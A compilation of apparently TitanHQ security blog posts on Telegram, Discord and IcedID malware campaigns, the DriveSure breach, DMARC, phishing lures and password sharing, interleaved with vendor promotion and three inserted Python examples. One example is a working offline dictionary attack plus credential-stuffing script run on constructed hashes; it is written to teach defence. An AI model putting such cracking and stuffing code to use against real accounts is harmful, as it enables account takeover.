Telegram is also used for distributing malware. Attackers can set up an account, use a Telegram bot to interact with other users and send files, and can reach non-Telegram users through phishing emails with malicious attachments. Phishing emails are how ToxicEye is being distributed: they carry a .exe attachment, and one campaign used a file titled “paypal checker by saint.exe” to download the malware.
If the attachment is opened and run, a connection is made to Telegram, allowing the attacker’s Telegram bot to deliver the malware. Once it is in place the attackers can carry out a variety of malicious activities, the main goals being to gather information about the infected device and to locate and exfiltrate passwords, cookies and browser history.
ToxicEye can kill running processes and take control of Task Manager, capture audio and video, steal clipboard contents, and launch other malware, including keyloggers and ransomware.
TitanHQ has two solutions that can safeguard your network and devices from ToxicEye and other Telegram-based phishing and malware campaigns. SpamTitan is a strong email security solution that blocks the malicious emails carrying the executables that download the ToxicEye RAT and other malware. For even more protection, SpamTitan should be paired with WebTitan web security, a DNS-based web filtering service that can be configured to block access to Telegram where it is not needed and to review traffic in real time for potentially dangerous destinations.
To find out more about these solutions and their pricing, and to register for a free trial, get in touch with TitanHQ now.
Cybercriminals have long targeted cloud-based instant messaging services that provide easy communication between users. One such service recently leveraged by hackers is Discord, and the platform is now being used extensively to spread phishing and malware.
Discord offers VoIP, instant messaging and digital distribution, and because of this it was adopted by the gaming community before gaining popularity with a much wider audience. 150 million users were registered worldwide during 2019, and membership has surged since. The service has also, for some time, been used by cybercriminals through its live chat feature for selling and trading stolen data, for anonymous communication, and as a C2 channel for communicating with infected devices.
Throughout 2021 the service has been widely used for distributing malware, including information stealers, cryptocurrency miners, Remote Access Trojans and ransomware, by abusing the cdn.discordapp.com service.
Like other collaboration apps, Discord uses a content delivery network (CDN) to store files shared within channels. Attackers can upload malicious files to Discord and create a public link that can be shared with anyone, not just Discord users. The generated URL begins with https://cdn.discordapp.com/, so anyone sent the link sees that it points at a legitimate site. Although there are controls to stop malicious files being uploaded, attackers often get around them and have their files hosted, and users are not always warned about the risk of opening files from Discord. Because payloads are delivered over encrypted HTTPS, the downloads are hidden from security solutions that do not inspect TLS traffic; a DNS- or URL-level control still sees the host name, but cannot tell a malicious attachment from a benign one on that host without looking at what the link delivers.
Additionally, once uploaded, a file can be deleted from a thread yet remain accessible through the public URL. Users are often tricked into installing these files under the guise of pirated software or games. Gamers are a particular focus because their PCs typically have high-end hardware, which makes them ideal for cryptocurrency mining.
This style of campaign means malware developers and distributors can share their payloads with a high degree of anonymity. A review by Zscaler found over 100 unique malware samples delivered from Discord in the Zscaler cloud in just a two-month period. Another review of Discord CDN links found approximately 20,000 results on VirusTotal.
Discord is not the only communication and collaboration platform leveraged by hackers. Slack and Telegram are also being abused in phishing and malware campaigns.
If you would like to enhance email security, get in touch with TitanHQ now to find out more about these award-winning cybersecurity solutions.
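Because the host name is legitimate, a filter has to look at what a cdn.discordapp.com link delivers rather than where it points. The following is an added example of that triage for links seen in mail or web logs, not Discord’s or any vendor’s code. It parses the attachment path, pulls out the file name and decides on the extension: executables are blocked, archives (the usual wrapper for a miner or RAT) are sent for detonation, a trailing decoy extension such as invoice.pdf.exe is treated as the executable it is, and anything else with an executable extension buried in the name is held for review. The attachment path layout, host list and sample URLs are assumptions constructed for the example; links on other hosts are left to the general URL policy.

```python
"""Added example: triage Discord CDN attachment links by what they deliver."""
import re
from urllib.parse import urlparse, unquote

DISCORD_CDN_HOSTS = {"cdn.discordapp.com", "media.discordapp.net"}
# Assumed attachment path shape: /attachments/<channel_id>/<message_id>/<filename>
ATTACHMENT_PATH_RE = re.compile(r"^/attachments/(\d+)/(\d+)/([^/]+)$")
EXECUTABLE_EXTS = {"exe", "scr", "msi", "bat", "cmd", "ps1", "vbs", "js", "jar", "dll", "hta", "lnk"}
ARCHIVE_EXTS = {"zip", "rar", "7z", "iso", "img"}


def triage_url(url: str) -> dict:
    """Return the CDN flag, the delivered file name and a verdict of
    'allow', 'review', 'sandbox' or 'block'."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    result = {"url": url, "discord_cdn": host in DISCORD_CDN_HOSTS,
              "filename": None, "verdict": "allow"}
    if not result["discord_cdn"]:
        return result                    # not our concern here; general policy applies
    m = ATTACHMENT_PATH_RE.match(p.path)
    if not m:
        result["verdict"] = "review"     # CDN host, but not a recognised attachment path
        return result
    filename = unquote(m.group(3)).lower()
    result["filename"] = filename
    exts = filename.split(".")[1:]       # every extension: 'invoice.pdf.exe' -> ['pdf', 'exe']
    last = exts[-1] if exts else ""
    if last in EXECUTABLE_EXTS:
        result["verdict"] = "block"
    elif last in ARCHIVE_EXTS:
        result["verdict"] = "sandbox"    # may wrap an executable; detonate before delivery
    elif any(e in EXECUTABLE_EXTS for e in exts):
        result["verdict"] = "review"     # e.g. 'tool.exe.txt': odd enough to hold
    return result


def triage_all(urls) -> dict:
    return {u: triage_url(u)["verdict"] for u in urls}


# Constructed sample links (IDs and names are made up)
SAMPLE_URLS = [
    "https://cdn.discordapp.com/attachments/811111111111111111/822222222222222222/GameCrack_Setup.exe",
    "https://cdn.discordapp.com/attachments/811111111111111111/822222222222222223/invoice.pdf.exe",
    "https://cdn.discordapp.com/attachments/811111111111111111/822222222222222224/mods.zip",
    "https://cdn.discordapp.com/attachments/811111111111111111/822222222222222225/screenshot.png",
    "https://cdn.discordapp.com/avatars/811111111111111111/abc.png",
    "https://example.org/downloads/tool.exe",
]

if __name__ == "__main__":
    for url, verdict in triage_all(SAMPLE_URLS).items():
        print(verdict.ljust(8), url)
```

Note that the decision is made from the URL alone, which is exactly what is available when the message carrying the link was deleted from the channel but the file is still served.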
Despite the fact that the vast majority of companies invest in the training for the workforce and implement security measures to protect their networks and data from cybercriminals, security breaches still happen which exposed huge amounts of sensitive data.
Recently, cybercriminals obtained more than 3.2 million records from DriveSure, a training provider that helps car dealerships sell to and retain customers. The data had been stored in the company's MySQL database, and the credentials for that database and other data stores had been publicly exposed on the Internet.
DriveSure has millions of customers who subscribe for access to its training and course material. Those customers provided names, addresses, phone numbers, email addresses, vehicle identification numbers (VINs), service records and damage claims, among many other pieces of information. The breach exposed data from large corporate accounts and compromised military addresses.
Earlier in 2021, researchers found this information published on several hacking forums. While most cybercriminals sell data like this for profit, in this case the hacker did not appear interested in money: the entire stolen database was made available for free, with no payment requested. The attacker's motives remain unclear, but giveaways like this are often a way for hackers to make a name for themselves and gain standing in the hacking community.
Whatever the motive, the data was posted free of charge on many hacking forums and could be downloaded by anyone. As more people downloaded the files, copies began to appear elsewhere as other hackers reshared them. Anyone with a DriveSure account should change their password, and change it on any other site where the same password was used.
Apart from the sensitive personal data leaked online, the individual responsible for the DriveSure breach also posted more than 93,000 bcrypt password hashes for download. In a well-built application, the developer stores a password as a salted hash rather than in plaintext, so that the original value is hard to recover. bcrypt is a standard choice for password hashing (it generates a random salt, embeds it in the output, and has a cost factor that makes each guess slow), so DriveSure stored passwords in a cryptographically sound way. The problem is that once the hashes are in an attacker's hands, guessing moves offline: there is no lockout and no limit on attempts, so the attacker can run guesses for as long as they like, and the slow hash only sets the price per guess.
With the hashes available, an attacker can spend days running cracking tools against all of them. Any weak or common password will be recovered, and many users reuse the same password on multiple sites. Since the email addresses are in the same dump, an attacker can script credential-stuffing attempts and take over accounts on other sites where the recovered DriveSure passwords were reused. Further, although some data was encrypted in line with compliance requirements, much of it was stored in plaintext.
With such a large amount of data available, it is certain to be used in phishing and email spoofing attacks. Cybercriminals can build convincing, personalized lures from the fields in the data set, so businesses need to be alert to the risk and should implement measures to block such attacks. An email security solution such as SpamTitan helps ensure that messages built from the leaked database are blocked before they reach inboxes. Additionally, security awareness training should be provided to the workforce, covering best practices such as not reusing passwords across accounts and how to identify phishing attacks.
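To make the two points above concrete (a salted slow hash still falls to an offline dictionary run when the password is weak, and a recovered email/password pair is immediately reusable elsewhere), here is an added example that is not part of the original article and not DriveSure's code. It stands in for bcrypt with PBKDF2-HMAC-SHA256 from the Python standard library so that it runs without third-party packages; the attacker's position is the same: the salt sits beside the hash, nothing rate-limits guesses, and the only cost is one slow hash per guess. The dump, wordlist and second site's user table are all constructed for the example.

```python
"""Offline dictionary attack on a leaked dump of salted, slow password hashes, then
credential stuffing with whatever was recovered. Added example; PBKDF2 is used here as a
stand-in for bcrypt (same salted, work-factored design, stdlib only)."""
from __future__ import annotations

import hashlib
import hmac
import secrets

ITERATIONS = 100_000  # work factor: the PBKDF2 analogue of bcrypt's cost parameter


def hash_password(password: str, salt: bytes | None = None, iterations: int = ITERATIONS) -> str:
    """Store a password as 'pbkdf2$<iterations>$<salt hex>$<digest hex>' with a fresh random salt."""
    salt = secrets.token_bytes(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2${iterations}${salt.hex()}${digest.hex()}"


def verify_password(guess: str, stored: str) -> bool:
    """Re-derive the hash for a guess using the salt stored in the record; constant-time compare."""
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", guess.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


# Constructed "leaked dump": email -> stored hash. Three users chose passwords found in
# any common-password list; one chose a long random string.
LEAKED_DUMP = {
    "alice@example.com": hash_password("Password123"),
    "bob@example.com": hash_password("summer2020"),
    "carol@example.com": hash_password("qwerty!"),
    "dave@example.com": hash_password("x9#Lq2!vT4@zRm8&bW"),
}

# Constructed wordlist standing in for the top-N lists attackers really use.
WORDLIST = ["123456", "password", "Password123", "summer2020", "qwerty!", "letmein", "welcome1"]


def crack_dump(dump: dict[str, str], wordlist: list[str]) -> tuple[dict[str, str], int]:
    """Try every wordlist entry against every hash.

    Returns (recovered email -> password, number of hash computations). Because each record
    carries its own salt, every guess must be re-hashed per user: the salt defeats precomputed
    tables, but not a per-hash dictionary run against weak passwords.
    """
    recovered: dict[str, str] = {}
    computations = 0
    for email, stored in dump.items():
        for guess in wordlist:
            computations += 1
            if verify_password(guess, stored):
                recovered[email] = guess
                break  # stop at the first hit; the strong password never matches
    return recovered, computations


# Constructed account table of an unrelated site; alice and carol reused their DriveSure password.
OTHER_SITE = {
    "alice@example.com": hash_password("Password123"),
    "bob@example.com": hash_password("Bob-picked-something-else-here"),
    "carol@example.com": hash_password("qwerty!"),
}


def credential_stuffing(recovered: dict[str, str], other_site: dict[str, str]) -> list[str]:
    """Replay recovered email/password pairs against another site; return the accounts that open."""
    return sorted(
        email for email, pw in recovered.items()
        if email in other_site and verify_password(pw, other_site[email])
    )


if __name__ == "__main__":
    found, cost = crack_dump(LEAKED_DUMP, WORDLIST)
    print(f"recovered {len(found)}/{len(LEAKED_DUMP)} passwords with {cost} hash computations: {found}")
    print("accounts taken over elsewhere:", credential_stuffing(found, OTHER_SITE))
```

The work factor only scales the cost of the 19 hash computations the run performs; raising it buys time against a large wordlist, but it cannot save a password that appears in the first few thousand guesses. The practical defenses the article goes on to recommend (unique passwords per site, and MFA where it is offered) are what break the credential-stuffing step.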
Cybercriminals are constantly coming up with new ways to infiltrate networks and maximize the return on the effort they invest in these attacks.
Even so, spam and phishing emails remain the most common vector for delivering malware. However, a new method has recently been identified in a campaign run by the threat group behind the IcedID banking Trojan and malware downloader: hijacking the contact forms on company websites. Contact forms are a feature of the vast majority of websites and are used to gather details from visitors for follow-up contact. Most of these forms are protected by CAPTCHA challenges intended to stop automated abuse.
Despite this, the IcedID operators found a way around the CAPTCHA protection and have been able to abuse contact forms to deliver malicious messages. The messages a contact form generates are delivered from the company's own form-handling system to inboxes that have whitelisted that sending address, so they bypass the email security gateway.
In the IcedID campaign, the contact forms are used to send messages claiming the recipient faces legal action over a copyright violation. The messages claim the company has used images on its website without the owner's explicit authorization, and that legal action will commence if the images are not removed immediately. A hyperlink is provided to a Google Sites page that supposedly lists the copyrighted images and proof that they are the intellectual property of the sender.
If the link is followed to review the supposed evidence, the browser downloads a ZIP archive containing an obfuscated .js downloader that fetches the IcedID payload. Once IcedID is installed, it delivers secondary payloads such as TrickBot, Qakbot and Ryuk ransomware.
IcedID distribution has been rising recently, not only via this vector but also in phishing campaigns. A large-scale phishing operation has been discovered that uses a range of business-themed lures with Excel attachments containing Excel 4.0 (XLM) macros that deliver the banking Trojan.
The surge in IcedID distribution is thought to be one element of a drive to infect large numbers of devices and build a botnet that can be rented out to other cybercriminal groups under the malware-as-a-service model. With the Emotet botnet taken down, there is a gap in the market, and IcedID appears to be trying to fill it.
To find out how you can protect your company from IcedID and other malware attacks at a reasonable price, contact TitanHQ today and discover why TitanHQ email and web security solutions receive 5-star ratings from users for security, cost, ease of use, and customer service and support.
In 2020, ransomware attacks soared and phishing and email impersonation attacks were seen at worryingly high levels.
Cybersecurity specialists have estimated that the global cost of ransomware to businesses in 2020 came in at around $20bn. It has also been predicted that ransomware will remain a primary attack method for years to come, as it is a proven way for these groups to make money.
The main focus of these attacks has traditionally been large companies, because of the huge amounts of personal data they manage and the potential for using it in identity theft. Smaller companies are a less attractive target on paper, but they also hold considerable amounts of customer data, and attacks on them can still be very profitable. Large enterprises are lucrative targets but can be hard to break into because they invest heavily in cybersecurity. Smaller enterprises, lacking that budget, tend to have more weaknesses that make them much easier to infiltrate.
This is why small and medium-sized enterprises are so often targeted with phishing campaigns. If a phishing email reaches an employee's inbox, there is a good chance the message will be opened and credentials will be compromised or malware downloaded.
The 2018 KnowBe4 Phishing Industry Benchmarking Report found that, on average, the probability of an employee clicking a malicious link or complying with another fraudulent request is 27%: roughly one in four employees will click a link in a phishing email or act on a fraudulent request.
In these phishing emails the sender is spoofed so the message appears to come from a known individual or company, using a genuine-looking address on a known business domain. Without proper security controls in place, that message will land in inboxes and many staff members are likely to be tricked into handing over their credentials or opening an infected file that downloads malware. More often than not, they will not realize they have been tricked.
One way of stopping these spoofed messages from reaching staff inboxes is to use Domain-based Message Authentication, Reporting and Conformance (DMARC). Put simply, DMARC builds on two existing technologies, Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM), and adds a published policy that tells receiving servers what to do with messages that fail both checks, along with reporting back to the domain owner.
SPF is a DNS-based check that helps identify spoofed messages. The domain owner publishes an SPF record in DNS listing the IP addresses and hosts authorized to send mail for the domain. Receiving servers look up that record and check whether the connecting sender's IP address is one of the authorized sources. If it is, SPF passes and the message proceeds to the intended inbox; if not, the message can be rejected or quarantined. One caveat: SPF is evaluated against the envelope sender (the Return-Path), not the From: address the user sees, which is why DMARC additionally requires that the authenticated domain aligns with the visible From: domain.
DKIM uses a digital signature to prove which domain a message came from. The sending mail server signs the message with the organization's private key, and the matching public key is published in DNS so that receiving servers can fetch it and verify the signature. DMARC rules are then applied to reject or quarantine messages that fail these authentication requirements. Quarantining is useful because it lets administrators review the held messages and confirm that genuine emails have not been flagged by mistake.
Reports can also be enabled to monitor email activity, so administrators can see how many messages are being rejected or quarantined. A sudden rise in rejected messages may indicate that the domain is being actively spoofed, although it can also point to a legitimate sender (a new marketing platform, for example) that was never added to the SPF record, so both possibilities should be checked.
DMARC may appear complicated, but when it is set up properly it is an invaluable security tool against phishing and malicious email content. A common approach is to start with a monitoring-only policy (p=none), review the reports, and only then move to quarantine and finally reject.
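The SPF lookup, the alignment rule and the DMARC disposition described above, worked through in code. This is an added example and not TitanHQ's or any real MTA's implementation: the DNS zone is a constructed dictionary so the example runs offline, the SPF evaluator handles only the ip4/ip6/include/all mechanisms (no a, mx, exists or redirect), and the "organizational domain" used for relaxed alignment is approximated as the last two labels rather than looked up in the Public Suffix List (so it is wrong for domains like example.co.uk). All domain names and addresses are reserved example values.

```python
"""SPF check, then DMARC alignment and policy, against a constructed DNS zone.
Added example; not production code. Lookups are served from ZONE instead of DNS."""
from __future__ import annotations

import ipaddress

# Constructed TXT records standing in for DNS.
ZONE = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.bulkmailer.example -all",
    "_spf.bulkmailer.example": "v=spf1 ip4:198.51.100.10 ~all",
    "_dmarc.example.com": "v=DMARC1; p=quarantine; adkim=s; aspf=r; rua=mailto:dmarc@example.com",
    "_dmarc.lax.example": "v=DMARC1; p=none",
}

SPF_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(domain: str, sender_ip: str, depth: int = 0) -> str:
    """Evaluate domain's SPF record for the connecting IP: pass/fail/softfail/neutral/none."""
    if depth > 10:  # rough stand-in for RFC 7208's limit on DNS-querying mechanisms
        return "permerror"
    record = ZONE.get(domain, "")
    if not record.startswith("v=spf1"):
        return "none"  # no SPF published for this domain
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"  # mechanisms default to "+" (pass) when unqualified
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        result = SPF_RESULT[qualifier]
        if term.startswith(("ip4:", "ip6:")):
            if ip in ipaddress.ip_network(term[4:], strict=False):
                return result
        elif term.startswith("include:"):
            # include: matches only if the referenced record yields pass for this IP
            if check_spf(term[8:], sender_ip, depth + 1) == "pass":
                return result
        elif term == "all":
            return result
    return "neutral"  # no mechanism matched and no "all" term


def org_domain(domain: str) -> str:
    """Approximate organizational domain (last two labels); real code uses the Public Suffix List."""
    return ".".join(domain.lower().rsplit(".", 2)[-2:])


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict ('s') needs an exact match; relaxed ('r') accepts the same organizational domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def parse_dmarc(record: str) -> dict[str, str]:
    """Split 'v=DMARC1; p=...; adkim=...' into tags, filling in the RFC 7489 defaults."""
    tags = {"p": "none", "adkim": "r", "aspf": "r"}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            tags[key.strip()] = value.strip()
    return tags


def evaluate_dmarc(from_domain: str, spf_result: str, spf_domain: str,
                   dkim_results: list[tuple[str, str]]) -> tuple[str, str]:
    """Return (dmarc result, disposition) for the RFC5322.From domain.

    spf_domain is the envelope MAIL FROM domain SPF was checked against; dkim_results holds
    one (result, d= domain) pair per DKIM-Signature header. DMARC passes if either mechanism
    passes AND its domain aligns with the visible From domain; otherwise the published p= applies.
    """
    record = ZONE.get(f"_dmarc.{from_domain}") or ZONE.get(f"_dmarc.{org_domain(from_domain)}")
    if record is None:
        return "none", "none"  # no policy published: the receiver falls back to its own rules
    policy = parse_dmarc(record)
    spf_ok = spf_result == "pass" and aligned(spf_domain, from_domain, policy["aspf"])
    dkim_ok = any(r == "pass" and aligned(d, from_domain, policy["adkim"]) for r, d in dkim_results)
    if spf_ok or dkim_ok:
        return "pass", "none"
    return "fail", policy["p"]


def receive(from_domain: str, mail_from_domain: str, sender_ip: str,
            dkim_results: tuple[tuple[str, str], ...] = ()) -> tuple[str, str, str]:
    """What a receiving MTA does: SPF on the envelope domain, then DMARC against the header From."""
    spf = check_spf(mail_from_domain, sender_ip)
    return (spf,) + evaluate_dmarc(from_domain, spf, mail_from_domain, list(dkim_results))


if __name__ == "__main__":
    print("legit:", receive("example.com", "example.com", "192.0.2.25"))
    print("spoof:", receive("example.com", "attacker.example", "203.0.113.7"))
```

The spoof case is the one the article describes: the attacker's own domain may even pass SPF for its own IP, but because that domain does not align with the From: header the victim sees, DMARC fails and the p=quarantine policy is applied. Note how adkim=s makes a signature from mail.example.com fail alignment for a From: of example.com; that is the usual reason organizations start with relaxed alignment.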
TitanHQ's anti-phishing and anti-spam service uses DMARC to prevent email impersonation attacks, alongside advanced anti-malware features such as a Bitdefender-powered sandbox. For more details about tackling email impersonation in your organization, contact TitanHQ now.
The operators of Gootloader compromise vulnerable WordPress websites and generate hundreds of pages of fake content, often completely unrelated to the theme of the site. A wide range of websites across many industry sectors has been affected, including retail, education, healthcare, travel and music, with the common denominator that they all run the WordPress CMS.
It is not yet known how the WordPress sites were compromised. They may not have been updated to the latest WordPress version, or may have had vulnerable plugins that were exploited; legitimate admin accounts could have been brute-forced, or other methods may have been used.
The content planted on the compromised sites takes the form of fake forum threads providing answers to specific questions, mostly relating to particular types of legal agreements and other documents. eSentire researchers who reviewed the campaign found that most of the posts on the compromised websites contained the word "agreement". A post asks a question such as "Do I need a party wall agreement to sell my house?", and a reply below it, using the exact same search phrase, offers a link that users can click to download a template agreement.
These pages target very specific questions for which there are few search results, so when search engines crawl the sites, the content ranks highly in the SERPs for that exact query. Relatively few people search for these terms, but most of those who do are looking for a sample agreement, and they download it and unwittingly install malware.
The planted content contains malicious code that shows the fake forum posts only to visitors from targeted locations; everyone else sees an underlying blog post that looks genuine at first glance but is mostly gibberish. The campaign uses black-hat SEO techniques to get the content into the SERPs. Search engines such as Google eventually remove it, but that takes time, and new questions and answers are constantly being created to keep Gootloader alive.
A new malware variant, dubbed Saint Bot, is being distributed in phishing emails with a Bitcoin-themed lure. With Bitcoin prices continuing to surge, the lure is expected to be more effective than ever and to fool many recipients into opening the attachment to access the promised wallet.
The phishing emails tell the recipient that a Bitcoin wallet is in the attached ZIP file. The archive contains a text file with instructions and an LNK file with an embedded PowerShell script. Anyone who follows the instructions triggers a chain: the PowerShell downloader installs an obfuscated .NET dropper and downloader, which loads a BAT script that disables Windows Defender, and the Saint Bot binary is then installed on the device.
Saint Bot is a dropper that can deliver secondary payloads, including information stealers, though it could be used to drop any strain of malware. It was first identified by researchers at Malwarebytes, who found no novel techniques in it, but the malware does appear to be under continuous development. Detections are currently low, but Saint Bot could grow into a serious threat to email users.
Once installed, the malware checks whether it is running in an analysis environment and deletes itself if so. Otherwise, it contacts its hard-coded command and control servers, sends information gathered from the infected system, and fetches secondary payloads onto the device using Discord.
The malware is not attributed to a particular threat group and could well be offered to multiple actors on darknet hacking forums, but it may become a significant threat used in widespread campaigns to exploit the gap in the malware-as-a-service (MaaS) market created by the takedown of the Emotet Trojan.
Protecting your network from malware downloaders such as Saint Bot requires a defense-in-depth approach. The simplest way to prevent infection is to deploy an advanced spam filtering solution such as SpamTitan to block the phishing emails that spread the malware. Antivirus software should also be installed on all endpoints and set to update automatically, and communication with the C2 servers should be blocked with firewall rules.
Alongside technical controls, it is crucial to provide security awareness training so staff can spot malicious emails and know how to respond when a possible threat is found.
The opportunity for cybercriminals to make large profits by filing fraudulent tax returns is significant, often resulting in refunds of thousands of dollars being paid out by the U.S. Internal Revenue Service (IRS). Every year, tax professionals are sent a range of IRS-themed phishing messages that seek sensitive data the cybercriminals can use to steal identities and file fraudulent returns in their victims' names.
In 2021 many tax-season phishing scams have been uncovered, including emails with subject lines such as "Tax Refund Payment" and "Recalculation of your tax refund payment" designed to get recipients to open them. The emails carry the genuine IRS logo and tell recipients they qualify for an additional tax refund, but to receive the payment they must click a link and fill out a form. The form looks like a real IRS.gov form and the page is an exact replica of the IRS website, but the site hosting it is not an official IRS portal.
The form asks for a wide range of personal information, supposedly so the refund can be processed: the individual's name, date of birth, Social Security number, driver's license number, current address, and electronic filing PIN. For added realism, the phishing page also shows a pop-up stating "This US Government System is for Authorized Use Only", the same warning displayed on the genuine IRS website.
The attackers appear to be focusing on universities and other educational institutions, public and private, for-profit and nonprofit, with many of the reported phishing emails coming from staff and students with .edu email addresses.
Educational institutions should take steps to reduce the chance of their staff and students being fooled by these scams. Alerting all .edu account holders to the campaign is essential, particularly as these messages are getting past Office 365 anti-phishing defenses and landing in inboxes.
Any educational institution that relies on Microsoft Exchange Online Protection (EOP) to block spam and phishing emails (EOP is the default protection included free with Office 365 licenses) should seriously consider strengthening its anti-phishing defenses with a third-party spam filter.
SpamTitan has been designed to provide better protection for Office 365 environments. It is used alongside Office 365, integrates easily with Office 365 email, and greatly improves spam and phishing protection, while dual antivirus engines and sandboxing provide strong defense against malware.
To find out more about SpamTitan anti-phishing protection for higher education institutions, contact the SpamTitan team. A free trial is available so you can evaluate the solution before deciding to buy.
A new PayPal phishing scam has been identified that tries to steal an extensive amount of personal data from victims by posing as a PayPal security alert.
Fake PayPal Email Alerts
The emails appear to come from PayPal's Notifications Center and tell users their account has been temporarily locked because of an attempted login from an unrecognized browser or device.
The emails contain a button labelled "Secure and update my account now !" that users are told to click to log in to PayPal and verify their identity. The link behind it is a shortened bit.ly address that redirects the victim to a spoofed PayPal page on a hacker-controlled domain.
Clicking the link brings up a spoofed PayPal login page. After entering their PayPal credentials, the victim is asked for a series of sensitive details to prove their identity as part of a supposed PayPal security check. The page states the information is required to unlock the account and lists the steps, along with a progress indicator showing how close the user is to regaining access.
First the attackers ask for the user's full name, billing address and phone number. Next the user must enter their full credit or debit card details. The following page asks for date of birth, Social Security number and ATM or debit card PIN, and finally the user is asked to upload a proof-of-identity document: a scan of a credit card, passport, driver's license or government-issued photo ID.
Request for Excessive Data
This PayPal phishing campaign asks for an excessive amount of data, which should itself be a warning that all is not as it seems, especially the requests for highly sensitive data such as a Social Security number and card PIN.
There are other signs in the email that the request is not genuine. It is not sent from a domain associated with PayPal, it opens with "Good Morning Customer" rather than the account holder's name, and the notice at the bottom advising the user to whitelist the sender if the email landed in the spam folder is poorly written. However, the email is crafted to push the recipient into acting quickly to avoid financial loss, and as with other PayPal phishing campaigns, many users are likely to be tricked into giving up at least some of their personal data.
Consumers should always exercise extreme caution and never respond immediately to any email warning of a security breach. Instead, they should stop, consider their next move, and carefully check the sender of the email or text. To check whether there is a genuine problem with the account, visit the PayPal website by typing the correct URL into the browser's address bar; never click links in the email.
To find out more about current phishing campaigns and the key security measures you can put in place to protect against them, get in touch with the SpamTitan team today.
How many times have you received a phone call or email from a manager in your organization asking for an employee's password so they can log into that employee's email account?
The request typically arises when an employee is on leave and a client or co-worker calls wanting to know whether a request sent before the holiday was completed. More often than not a client emailed their account manager just before he or she went on vacation, and the message was overlooked.
Access to the mailbox is needed to avoid embarrassment or to make sure a sales opportunity is not lost. Perhaps the employee forgot to set an Out of Office reply, so clients do not know they need to contact someone else to get their questions answered.
In years past, managers would keep a list of all users' passwords in a file on their computer. In an emergency they could look up the password and access any user's account. This is dangerous and is no longer acceptable. It also compromises employees' privacy: once a password is known to another person, nothing stops that person from using the credentials whenever they like, and because people often reuse passwords for personal and work accounts, sharing a work password can expose personal accounts as well.
Keeping lists of passwords also makes it harder to act on inappropriate internet and email use. If a password has been shared, there is no way to establish whether the account holder broke the law or breached company policy; it could have been someone else using that person's credentials.
IT staff should therefore never share passwords. Instead they must reset the user's password, issue a temporary one, and require the user to change it on return. Many managers will be uncomfortable with this procedure and will still want to keep their lists, and employees will be unhappy too, since they often use work email for personal messages; resetting a password and handing access to a manager can be seen as a serious invasion of privacy.
However, there is a simple solution that preserves individual privacy while still allowing a forgotten Out of Office auto-responder to be set and ensuring important emails are not missed: shared mailboxes, although these are not always popular.
If this is done in Outlook, a manager may need to set it up in their own Outlook client, train staff in how to use the shared mailboxes, and possibly draw up policies. They may also end up keeping the mailboxes of several teams permanently open in Outlook.
Another option is to delegate permissions. This is harder to set up, as it requires an Exchange administrator to grant Delegate Access. With Delegate Access, a person with the appropriate authorization can send email on behalf of another staff member, so mailboxes do not need to be open all the time and can be accessed only when a message must be sent. That may be ideal, but it still does not let a manager set a forgotten Out of Office auto-responder.
That task would fall to a member of the IT department, such as a domain administrator, and a ticket would need to be raised to request it. Managers may not like this, but it is the only way to get the job done without sharing the user's credentials or setting a temporary password, either of which would breach their privacy.
Organizations face an ever-growing threat from hackers. In 2019 and 2020 we saw many high-profile data breaches with significant financial repercussions and reputational damage. Password sharing at work is a huge risk: 81% of breaches begin with stolen or weak passwords, and once cybercriminals gain a foothold in your network, shared passwords make it easier for them to reach other parts of it.
Multi-Factor Authentication to Prevent Password Sharing
When MFA is enabled, access is granted only after the user presents two authentication factors. For example, they first enter their password and then must complete a second authentication step, such as entering a code sent to a registered device. A shared password alone is then no longer enough to log in. Like any security control, multi-factor authentication works best when combined with other security measures.
If a complete ban on password sharing is not in place in your organization, it should be introduced as soon as possible. To find out more about password security and the key protections you can implement to improve your resilience against attacks, contact the SpamTitan team today.
TitanHQ has won three Expert Insights awards for its email security, web security and email archiving solutions.
Expert Insights was founded in 2018 to help companies identify cybersecurity solutions to protect their networks and devices from an ever-growing range of cyber threats. Choosing cybersecurity solutions can be a long process, and the insights and information Expert Insights provides shorten it considerably. Unlike many resources that list the best software solutions, Expert Insights carries ratings from verified users of the products, giving readers valuable insight into how easy the products are to use and how effective they are at preventing threats. Expert Insights has helped more than 100,000 businesses choose cybersecurity solutions, and the website is used by over 40,000 people every month.
Once a year, Expert Insights recognizes the best and most innovative cybersecurity solutions in its "Best-Of" Awards. The Expert Insights editorial team assesses vendors and their products on a range of criteria, including technical features, ease of use, market presence, and reviews from verified users. Every product is reviewed by technology experts to decide the winners across a broad set of categories, including cloud, email, endpoint, web, identity, and backup security.
Craig MacAlpine, CEO and Founder, Expert Insights said: "2020 was an unprecedented year of cybersecurity challenges, with a rapid rise in remote working causing a massive acceleration in cybercrime. Expert Insights' Best-Of awards are designed to recognize innovative cybersecurity providers like TitanHQ that have developed powerful solutions to keep businesses safe against increasingly sophisticated cybercrime."
Three TitanHQ products were named winners in the Expert Insights 2021 "Best-Of" Awards, in the Email Security Gateway, Web Security and Email Archiving categories. SpamTitan took the title of Best Email Security Gateway, WebTitan won the Web Security award, and ArcTitan was named winner in the Email Archiving category. SpamTitan and WebTitan were recognized for the level of protection they provide while being among the easiest to use and most cost-effective solutions in their respective categories.
All three products are consistently rated best in class for the level of protection they provide and are a big hit with enterprises, SMBs and MSPs. The solutions have received many 5-star reviews from real users on the Expert Insights site and many other review portals, including Capterra, GetApp, Software Advice, Google Reviews and G2 Crowd. TitanHQ's cybersecurity solutions are now deployed by more than 8,500 companies and over 2,500 MSPs.
Ronan Kavanagh, CEO, TitanHQ said: “The recent pandemic and the growth of remote working initiatives have further highlighted the need for multiple layers of cybersecurity and our award-winning solutions form key pillars in this security strategy. We will continue to innovate and provide solutions that MSPs can use to deliver a consistent, secure and reliable experience to their customers.”
